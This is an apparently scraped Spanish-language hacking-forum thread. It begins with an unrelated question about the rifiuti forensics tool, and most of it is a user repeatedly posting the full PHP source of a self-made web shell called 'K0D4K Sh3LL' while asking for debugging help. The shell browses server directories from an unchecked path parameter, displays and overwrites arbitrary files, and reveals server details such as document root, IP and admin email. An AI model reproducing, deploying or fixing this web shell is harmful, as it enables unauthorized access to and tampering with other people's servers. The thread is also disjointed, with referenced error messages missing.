Hola a todo el foro de seguridad  , les traigo una pregunta 
estaba siguiendo el tutorial que hay en esta comunidad de Informatica forense

http://www.elhacker.net/InfoForenseWindows2.html

Despues de haber bajado el programa rifiuti.exe
intento acceder a la ruta donde se encuentra info2

que supuestamente seria aca:


y me responde que no se puede encontrar la ruta :S

alguien sabe a que se debe esto ?

muchas gracias  

Shell te ordene el code  cuando tenngas un minuto, mira el post anterior y respondeme  jaja

<html>
<head>
<title> K0D4K Sh3LL! </title>
 
<style type="text/css">
 
 
body {
 
	background-color:#000000;
	cursor:crosshair;
	font-family:monospace;
}
 
datito {
 
	color:FF0000;
	font-weight:bold;
	font-family:verdana;
	font-size:15px;
}
 
 
cartele {
 
	font-size:20px;
	color:#FF8000;
	font-weight:bold;
}
 
directorio {
 
	font-size:small;
	font-type:Comic Sans Ms;
	font-color:red;
	font-family:verdana;
	font-weight:bold;
 
}
 
table {
 
	font-size:13px;
	border-collapse: collapse;
 
}
 
th {
	border-right: 1px solid #000;
	border-bottom: 1px solid #000;
	padding: 0.5em;
	background-color:#FF8000;
 
}
 
corchetes {
 
	color:#FF0000;
	font-family:verdana;
	font-size:26px;
	font-weight:bold;
	font-style:italic;
}
 
signos {
 
	font-weight:bold;
	color:#FF8000;
	font-size:24px;
}
 
k {
 
	color:#FF0000;
	font-size:25px;
	font-weight:bold;
	font-style:italic;
	font-family:verdana;
}
 
cero {
 
	color:#FF8000;
	font-size:23px;
	font-size:25px;
	font-weight:bold;
	font-style:italic;
	font-family:verdana;
}
 
guion {
 
	color:#FF8000;
	font-size:25px;
}
 
 
a:link {
 
	font-size:15px;
	color:red;
	text-decoration:none;
}
 
a:visited {
 
	color:red;
	text-decoration:none;
 
}
 
a:hover {
 
	cursor:crosshair;
	color:orange;
	text-decoration:none;
	font-size:16px;
}
 
datos {
 
	font-size:medium;
	color:#FF8000;
	font-family:verdana;
}
 
 
</style>
</head>
<body>
<center>
<corchetes>[</corchetes> <signos>!</signos> <corchetes>]</corchetes> <k> K</k> <cero>0</cero> <k>D</k> 
<cero>4</cero> <k>K</k>   <guion>-</guion>   <k>S</k> <cero>H</cero> <k>3</k> <cero>L</cero> <k>L</k> <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes></center>
<br><br>     
</center>
<center>     
<br>
<br>
 
<div style="bottom: 50%%; width: 60%; left: 23%; right: 7%; top: 28%;
visibility: visible; z-index:10; font-family: Courier New; background-color: #000000;border:1.5px orange dashed; text-decoration: none; text-aling: center;">
 
<br>
 
<a href="?shell=archivo"> Ver Archivos</a>
<br>
<a href="?shell=datos"> Informacion Del Servidor</a>
<br>
<a href="?shell=phpinfo"> Link3</a>
<br>
<a href="?shell=creditos">Creditos</a>
<br>
 
 
</div>
</center>
</center>
<br>
 
<?php
	if($_GET['shell']=="datos") {     // si lo devuelto por shell == datos
		$ROOT=$_SERVER["DOCUMENT_ROOT"];     // variable para saber donde esta instalado el wamp
		$SADMIN=$_SERVER["SERVER_ADMIN"];           //mail admin
		$SELF=$_SERVER["PHP_SELF"];                //
		$servers=$_SERVER['SERVER_SOFTWARE'];    //version del software
		$ipserver=$_SERVER['SERVER_ADDR'];      //ip del serviodr
		$lugarshell=$_SERVER['SCRIPT_FILENAME'];                 //lugar donde esta nuestro archivo
		$sname = $_SERVER['SERVER_NAME'];                  // nombre del servidor
		$port= $_SERVER['SERVER_PORT'];                  //puerto para realizar la conexion
		$hconection= $_SERVER['HTTP_CONNECTION'];
		$haceptlanguaje=$_SERVER['HTTP_ACCEPT_LANGUAGE']; //header accept-language
		$hencoding=$_SERVER['HTTP_ACCEPT_ENCODING'];      //header encoding
		$hcharset =$_SERVER['HTTP_ACCEPT_CHARSET'];        // header charset
		$hmetod =$_SERVER['REQUEST_METHOD'];                // header method
		$hproto = $_SERVER['SERVER_PROTOCOL'];
 
 
	echo "<br><br><br><br>";
	echo "<carteles>";
	echo "Datos del servidor:";
	echo "</carteles>";
	echo "<br><br><br>";
	echo "<datos>";
	echo "Version de software: ";
	echo "</datos>";
	echo "<datitos>";
	echo $servers;
	echo "</datitos>";
	echo "</info>";
	echo "<br>";
	echo "<datos>";
	echo "IP del servidor: ";
	echo "</datos>";
	echo "<datitos>";
	echo $ipserver;
	echo "</datitos>";
	echo "<br>";
	echo "<datos>";
	echo "Server name: ";
	echo "</datos>";
	echo "<datitos>";
	echo $sname;
	echo "</datitos>";
	echo "<br>";
	echo "<datos>";
	echo "Instalado en: ";
	echo "</datos>";
	echo "<datitos>";
	echo $ROOT;
	echo "</datitos><br>";
	echo "<datos>";
	echo "Directorio shell: ";
	echo "</datos>";
	echo "<datitos>";
	echo $lugarshell;
	echo "</datitos>";
	echo "<datos><BR>";
	echo "Mail Admin: ";
	echo "</datos>";
	echo "<datitos>";
	echo $SADMIN;
	echo "</datitos><BR>";
	echo "<datos>";
	echo "Puerto usado para la conexion: ";
	echo "</datos>";
	echo "<datitos>";
	echo $port;
	echo "</datitos>";
	echo "</info>";
	echo "<br><br><br>";
	echo "<carteles>";
	echo "Headers:<br><br>";
	echo "</carteles>";
	echo "<datos>";
	echo "Header Connection: ";
	echo "</datos>";
	echo "<datitos>";
	echo $hconection;
	echo "</datitos>";
	echo "</info><br>";
	echo "<datos>";
	echo "Header Accept-Language: ";
	echo "</datos>";
	echo "<datitos>";
	echo $haceptlanguaje;
	echo "</datitos>";
	echo "</info><br>";
	echo "<datos>";
	echo "Header Encoding: ";
	echo "</datos>";
	echo "<datitos>";
	echo $hencoding;
	echo "</datitos>";
	echo "</info><br>";
	echo "<datos>";
	echo "Header Accept-Charset: ";
	echo "</datos>";
	echo "<datitos>";
	echo $hcharset;
	echo "</datitos>";
	echo "</info><br>";
	echo "<datos>";
	echo "Header Method: ";
	echo "</datos>";
	echo "<datitos>";
	echo $hmetod;
	echo "</datitos>";
	echo "</info><br>";
	echo "<datos>";
	echo "Protocol Version: ";
	echo "</datos>";
	echo "<datitos>";
	echo $hproto;
	echo "</datitos>";
	echo "</info><br>";
}  
 
else {                           
 
 
	if(isset($_GET['path'])) {       
 
		$path = $_GET['path'];                                           
		$dir = dir($path);  
}    
else {      
		$path = getcwd();       
		$dir = dir($path);
}       
 
if($_GET['shell'] == "archivo" OR $_GET['path']!== ""  ) {
 
	echo "<br>";
	echo "<div align=right>";
	echo "<table><tr>";
	echo "<th>Posicion:</th><th>";
	echo "$path";
	echo "</th>";
	echo "</table>";
	echo "</div>";
	echo "</chica>";
	echo "<br>";
        echo "<center>";
	echo "<carteles><br>";
	echo "Directorios:<br>";
	echo "</carteles>";
	$contador = 0;
	while ($file = $dir->read()) {
		$extension = filetype($path."/".$file);
		if ($extension == "dir") {
			$contador+=1;
			$ruta = urlencode($path."/".$file);
			echo "<directorios>";
			echo "<a href=?path=".$ruta.">".$file."</a><br>";
 
}
 
}
 
echo "</directorios>";
echo "<br><br><carteles>";
echo "Archivos:";
echo "</carteles><br>";
$dir->rewind();
$contador=0;
while($file = $dir->read()) {
	$extension=filetype($path."/".$file);
	if ($extension !=="dir") {
		$contador+=1;
		$ruta=urlencode($path."/".$file);
		echo "<directorios>";
		echo "<a href=?view=".$ruta.">".$file."</a><br>";}}
		if ($contador==0) {
		echo "No hay archivos en el directorio";
}
 
echo "<br><br>";
echo "</center>";
		$dir->close();
echo "</directorios>";
 
 
if(isset($_GET['view'])) {
	$ruta = $_GET['view'];
	echo "<h2><font color=orange><center>";
	echo "Editando: $ruta";
	echo "</font></center></h2>";
	echo "<center>";
	echo "<form method=POST action=\"\">";
	echo "<div style=133%><textarea name=\"modi\" cols=35 rows=15>";
	$abrir=fopen($ruta,"r");
	$texto = fread($abrir, filesize($ruta));
	echo htmlentities($texto);
	echo "</textarea></div>";
	echo "<input type=submit name=\"Change\" value=\"Editar\">";
	echo "</form>";
	echo "</center>";
	if(isset($_POST['Change'])) {
		$arc=fopen($ruta, "w+");
		$txt=$_POST['modi'];
		@$ok = fwrite($arc,$txt);
}
}
}
 
if($_GET['shell'] == "creditos") {
	header("location: http://www.kodakwebshell.blogspot.com/search/labels/creditos");
 
}
} //cierro el primer if de control
?> 
</body>
</html>
 
 

Por cierto los errores se encuentran en:


line 161:


line 291:

Saludos

Muchas gracias zazú, les dejo el codigo y algo que esta molestando :

<html>
<head>
<title> K0D4K Sh3LL! </title>
<style type="text/css">
body {
background-color:#000000;
cursor:crosshair;
 
font-family:monospace;
}
 
datitos{
color:FF0000;
font-weight:bold;
font-family:verdana;
font-size:15px;
}
 
 
carteles {
font-size:20px;
color:#FF8000;
font-weight:bold;
}
 
directorios{
font-size:small;
font-type:Comic Sans Ms;
font-color:red;
font-family:verdana;
font-weight:bold;
}
 
table
{
font-size:13px;
  border-collapse: collapse;
}
 
th
{
  border-right: 1px solid #000;
  border-bottom: 1px solid #000;
  padding: 0.5em;
  background-color:#FF8000;
}
 
corchetes {
color:#FF0000;
font-family:verdana;
font-size:26px;
font-weight:bold;
font-style:italic;
}
 
signos {
font-weight:bold;
color:#FF8000;
font-size:24px;
}
 
k{
color:#FF0000;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}
 
cero{
color:#FF8000;
font-size:23px;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}
 
guion{
color:#FF8000;
font-size:25px;
}
 
 
a:link {
font-size:15px;
color:red;
text-decoration:none;
}
a:visited{
color:red;
text-decoration:none;
}
a:hover {
cursor:crosshair;
color:orange;
text-decoration:none;
font-size:16px;
}
 
datos{
font-size:medium;
color:#FF8000;
font-family:verdana;
}
 
 
</style>
<title> K0D4K Web Sh3LL! </title>
</head>
<body>
<center>
<corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes>
<k> K</k> <cero>0</cero> <k>D</k> <cero>4</cero> <k>K</k>   <guion>-</guion>   <k>S</k> <cero>H</cero> <k>3</k> <cero>L</cero> <k>L</k> <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes></center>
  <br><br>     <center>
 
    <center>     <br><br>
<div style="bottom: 50%%; width: 60%; left: 23%; right: 7%; top: 28%;
visibility: visible; z-index:10; font-family: Courier New; background-color: #000000;border:1.5px orange dashed; text-decoration: none; text-aling: center;">
 
<center>         <br>
 
<a href="?shell=archivo"> Ver Archivos </a><br>
<a href="?shell=datos"> Informacion Del Servidor </a><br>
<a href="?shell=phpinfo"> Link3</a>  <br>
<a href="?shell=creditos">Creditos</a>     <br>
 
 
</div></center></center>
<br>
 
<?php
if($_GET['shell']=="datos") {     // si lo devuelto por shell == datos
$ROOT=$_SERVER["DOCUMENT_ROOT"];     // variable para saber donde esta instalado el wamp
$SADMIN=$_SERVER["SERVER_ADMIN"];           //mail admin
$SELF=$_SERVER["PHP_SELF"];                //
$servers=$_SERVER['SERVER_SOFTWARE'];    //version del software
$ipserver=$_SERVER['SERVER_ADDR'];      //ip del serviodr
$lugarshell=$_SERVER['SCRIPT_FILENAME'];                 //lugar donde esta nuestro archivo
$sname = $_SERVER['SERVER_NAME'];                  // nombre del servidor
$port= $_SERVER['SERVER_PORT'];                  //puerto para realizar la conexion
$hconection= $_SERVER['HTTP_CONNECTION'];
$haceptlanguaje=$_SERVER['HTTP_ACCEPT_LANGUAGE']; //header accept-language
$hencoding=$_SERVER['HTTP_ACCEPT_ENCODING'];      //header encoding
$hcharset =$_SERVER['HTTP_ACCEPT_CHARSET'];        // header charset
$hmetod =$_SERVER['REQUEST_METHOD'];                // header method
$hproto = $_SERVER['SERVER_PROTOCOL'];
echo "<br><br><br><br>";
echo "<carteles>";
echo "Datos del servidor:";
echo "</carteles>";
echo "<br><br><br>";
echo "<datos>";
echo "Version de software: ";
echo "</datos>";
echo "<datitos>";
echo $servers;
echo "</datitos>";
echo "</info>";
echo "<br>";
echo "<datos>";
echo "IP del servidor: ";
echo "</datos>";
echo "<datitos>";
echo $ipserver;
echo "</datitos>";
echo "<br>";
echo "<datos>";
echo "Server name: ";
echo "</datos>";
echo "<datitos>";
echo $sname;
echo "</datitos>";
echo "<br>";
echo "<datos>";
echo "Instalado en: ";
echo "</datos>";
echo "<datitos>";
echo $ROOT;
echo "</datitos><br>";
echo "<datos>";
echo "Directorio shell: ";
echo "</datos>";
echo "<datitos>";
echo $lugarshell;
echo "</datitos>";
echo "<datos><BR>";
echo "Mail Admin: ";
echo "</datos>";
echo "<datitos>";
echo $SADMIN;
echo "</datitos><BR>";
echo "<datos>";
echo "Puerto usado para la conexion: ";
echo "</datos>";
echo "<datitos>";
echo $port;
echo "</datitos>";
echo "</info>";
echo "<br><br><br>";
 echo "<carteles>";
echo "Headers:<br><br>";
echo "</carteles>";
echo "<datos>";
echo "Header Connection: ";
echo "</datos>";
echo "<datitos>";
echo $hconection;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Header Accept-Language: ";
echo "</datos>";
echo "<datitos>";
echo $haceptlanguaje;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Header Encoding: ";
echo "</datos>";
echo "<datitos>";
echo $hencoding;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Header Accept-Charset: ";
echo "</datos>";
echo "<datitos>";
echo $hcharset;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Header Method: ";
echo "</datos>";
echo "<datitos>";
echo $hmetod;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Protocol Version: ";
echo "</datos>";
echo "<datitos>";
echo $hproto;
echo "</datitos>";
echo "</info><br>";
}   //cierro if de si shell == datos
else {                              //de lo contrario (si shell no es == datos
 
 
if(isset($_GET['path'])) {         // si la variable path tiene algo
$path = $_GET['path'];                                              //almaceno en path lo devuelvo por $_get[path]
$dir = dir($path);  // dir = dir(ruta que devolvio get
}     // cierro if
else {      // de lo contrario si no esta definido get path
$path = getcwd();        //$path toma el valor del directorio actual
$dir = dir($path);
}        //cierro else
 
if($_GET['shell'] == "archivo" OR $_GET['path']!== ""  ) {
 
echo "<br>";
 echo "<div align=right>";
echo "<table><tr>";
echo "<th>Posicion:</th><th>";
echo "$path";
echo "</th>";
echo "</table>";
echo "</div>";
echo "</chica>";
echo "<br>";
 
           echo "<center>";
echo "<carteles><br>";
echo "Directorios:<br>";
"</carteles>";
$contador = 0;
while ($file = $dir->read()) {
$extension = filetype($path."/".$file);
if ($extension == "dir") {
$contador+=1;
$ruta = urlencode($path."/".$file);
echo "<directorios>";
echo "<a href=?path=".$ruta.">".$file."</a><br>";
}
}
echo "</directorios>";
 
echo "<br><br><carteles>";
echo "Archivos:";
echo "</carteles><br>";
$dir->rewind();
$contador=0;
while($file = $dir->read()) {
$extension=filetype($path."/".$file);
if ($extension !=="dir") {
$contador+=1;
$ruta=urlencode($path."/".$file);
echo "<directorios>";
echo "<a href=?view=".$ruta.">".$file."</a><br>";}}
if ($contador==0) {
echo "No hay archivos en el directorio";
}
echo "<br><br>";
echo "</center>";
$dir->close();
echo "</directorios>";
 
 
if(isset($_GET['view'])) {
$ruta = $_GET['view'];
echo "<h2><font color=orange><center>";
echo "Editando: $ruta";
echo "</font></center></h2>";
echo "<center>";
echo "<form method=POST action=\"\">";
 
echo "<div style=133%><textarea name=\"modi\" cols=35 rows=15>";
$abrir=fopen($ruta,"r");
$texto = fread($abrir, filesize($ruta));
echo htmlentities($texto);
echo "</textarea></div>";
 
echo "<input type=submit name=\"Change\" value=\"Editar\">";
echo "</form>";
echo "</center>";
if(isset($_POST['Change'])) {
$arc=fopen($ruta, "w+");
$txt=$_POST['modi'];
@$ok = fwrite($arc,$txt);
}
}
}
 
if($_GET['shell'] == "creditos") {
header("location: http://www.kodakwebshell.blogspot.com/search/labels/creditos");
 
}
}
?> 
</body>
</html>

Bueno, les comento el problema:

al ir a la pestaña informacion del servidor, ningun problema, pero
cuando vamos a ver archivos y empezamos a explorar rutas, saltan diferentes errores:



y cuando utilizamos la variable view= para modificar los archivos estos:


ya se que me van a decir, es que no definiste las variables, pero el problema es qe no se como hacerlo, ya probe añadiendo un par de OR a las sentencias anteriores y nada :/
Muchas gracias :)w

disculpen que reabra el tema :=(         
saludos 

ya conozco el tema del switch muchas gracias, pero el error sigue saliendo igual, sospecho que nadie se molesto en compilar el script y ver que pasa :/

saludos

PD: sigue estando el mismo error

¿? jajjaja que fue esa cara xD

gracias por las rapidas respuestas, yo habia hecho lo mismo que tu shell root, va, esa fue mi primer idea, pero al ver lo que pasaba intente meter otra cosa..

lo que pasa con eso es que cuando intentas navegar por los directorios, te lleva a la pagina principal, osea no navega por los directorio..


Eso estaria bueno, pero en una webshell no puedo subir muchos archivos al servidor, la gracia de la webshell es que sea un solo archivo

saludos

Hola gente, estoy realizando una webshell y me surgio un problema, la webshell la pantalla principal consta de un menu para ver archivos info del servidor y creditos

bueno el problema es que cuando voy a la parte de de informacion del servidor se mete tambien lo que hay en menu
lo mejor va a ser que lo vean..
les dejo el codigo

<html>
<head>
<title> K0D4K Sh3LL! </title>
<style type="text/css">
body {
background-color:#000000;
cursor:crosshair;
 
font-family:monospace;
}
 
datitos{
color:FF0000;
font-weight:bold;
font-family:verdana;
font-size:15px;
}
 
carteles {
font-size:20px;
color:#FF8000;
font-weight:bold;
}
 
directorios{
font-size:small;
font-type:Comic Sans Ms;
font-color:red;
font-family:verdana;
font-weight:bold;
}
 
table
{
font-size:13px;
  border-collapse: collapse;
}
 
th
{
  border-right: 1px solid #000;
  border-bottom: 1px solid #000;
  padding: 0.5em;
  background-color:#FF8000;
}
 
corchetes {
color:#FF0000;
font-family:verdana;
font-size:26px;
font-weight:bold;
font-style:italic;
}
 
signos {
font-weight:bold;
color:#FF8000;
font-size:24px;
}
 
k{
color:#FF0000;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}
 
cero{
color:#FF8000;
font-size:23px;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}
 
guion{
color:#FF8000;
font-size:25px;
}
 
 
a:link {
font-size:15px;
color:red;
text-decoration:none;
}
a:visited{
color:red;
text-decoration:none;
}
a:hover {
cursor:crosshair;
color:orange;
text-decoration:none;
font-size:16px;
}
 
datos{
font-size:medium;
color:#FF8000;
font-family:verdana;
}
 
 
</style>
<title> K0D4K Web Sh3LL! </title>
</head>
<body>
<center>
<corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes>
<k> K</k> <cero>0</cero> <k>D</k> <cero>4</cero> <k>K</k>   <guion>-</guion>   <k>S</k> <cero>H</cero> <k>3</k> <cero>L</cero> <k>L</k> <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes></center>
  <br><br>     <center>
 
    <center>     <br><br>
<div style="bottom: 50%%; width: 60%; left: 23%; right: 7%; top: 28%;
visibility: visible; z-index:10; font-family: Courier New; background-color: #000000;border:1.5px orange dashed; text-decoration: none; text-aling: center;">
 
<center>         <br>
 
<a href="?shell=archivo"> Ver Archivos </a><br>
<a href="?shell=datos"> Informacion Del Servidor </a><br>
<a href="?shell=phpinfo"> Link3</a>  <br>
<a href="?shell=creditos">Creditos</a>     <br>
 
 
</div></center></center>
<br>
 
<?php
 
 
 
if(isset($_GET['path'])) {
$path = $_GET['path'];
$dir = dir($path);
}
else {
$path = getcwd();
$dir = dir($path);
}
if($_GET['shell'] == "archivo" or $_GET['path']!== "") {
 
echo "<br>";
 echo "<div align=right>";
echo "<table><tr>";
echo "<th>Posicion:</th><th>";
echo "$path";
echo "</th>";
echo "</table>";
echo "</div>";
echo "</chica>";
echo "<br>";
 
           echo "<center>";
echo "<carteles><br>";
echo "Directorios:<br>";
"</carteles>";
$contador = 0;
while ($file = $dir->read()) {
$extension = filetype($path."/".$file);
if ($extension == "dir") {
$contador+=1;
$ruta = urlencode($path."/".$file);
echo "<directorios>";
echo "<a href=?path=".$ruta.">".$file."</a><br>";
}
}
echo "</directorios>";
 
echo "<br><br><carteles>";
echo "Archivos:";
echo "</carteles><br>";
$dir->rewind();
$contador=0;
while($file = $dir->read()) {
$extension=filetype($path."/".$file);
if ($extension !=="dir") {
$contador+=1;
$ruta=urlencode($path."/".$file);
echo "<directorios>";
echo "<a href=?view=".$ruta.">".$file."</a><br>";}}
if ($contador==0) {
echo "No hay archivos en el directorio";
}
echo "<br><br>";
echo "</center>";
$dir->close();
echo "</directorios>";
 
 
if(isset($_GET['view'])) {
$ruta = $_GET['view'];
echo "<h2><font color=orange><center>";
echo "Editando: $ruta";
echo "</font></center></h2>";
echo "<center>";
echo "<form method=POST action=\"\">";
 
echo "<div style=133%><textarea name=\"modi\" cols=35 rows=15>";
$abrir=fopen($ruta,"r");
$texto = fread($abrir, filesize($ruta));
echo htmlentities($texto);
echo "</textarea></div>";
 
echo "<input type=submit name=\"Change\" value=\"Editar\">";
echo "</form>";
echo "</center>";
if(isset($_POST['Change'])) {
$arc=fopen($ruta, "w+");
$txt=$_POST['modi'];
@$ok = fwrite($arc,$txt);
}
}
}
?>
<?php
if($_GET['shell']=="datos") {
echo "<br><br><br>";
$servers=$_SERVER['SERVER_SOFTWARE'];
$ipserver=$_SERVER['SERVER_ADDR'];
$lugarshell=$_SERVER['SCRIPT_FILENAME'];
echo "<carteles>";
echo "Datos del servidor:";
echo "</carteles>";
 
echo "<br><br><br>";
echo "<datos>";
echo "Version de software: ";
echo "</datos>";
echo "<datitos>";
echo $servers;
echo "</datitos>";
echo "</info>";
echo "<br>";
echo "<datos>";
echo "IP del servidor: ";
echo "</datos>";
echo "<datitos>";
echo $ipserver;
echo "</datitos>";
echo "<br>";
echo "<datos>";
echo "Directorio shell: ";
echo "</datos>";
echo "<datitos>";
echo $lugarshell;
echo "</datitos>";
}
?>
<?php
if($_GET['shell'] == "creditos") {
header("location: http://www.kodakwebshell.blogspot.com/search/labels/creditos");
 
}
?>
</body>
</html>

muchas gracias

miren, hagan de cuenta como que no dije nada.. dale ?
jaja muchas gracias
perdon 

creo que no me entendieron -.-

ese codigo lo añade mi arroba, yo pongo este:


yo no añado los backslashes, los añade mi arroba

PD: Shell root, la etiqueta no esta mal cerrada, funciona de las dos maneras

disculpa Shell, pero no entiendo en la parte que dices que escapo de las comillas dobles  .

Podrias expresarte mejor ?

Muchas gracias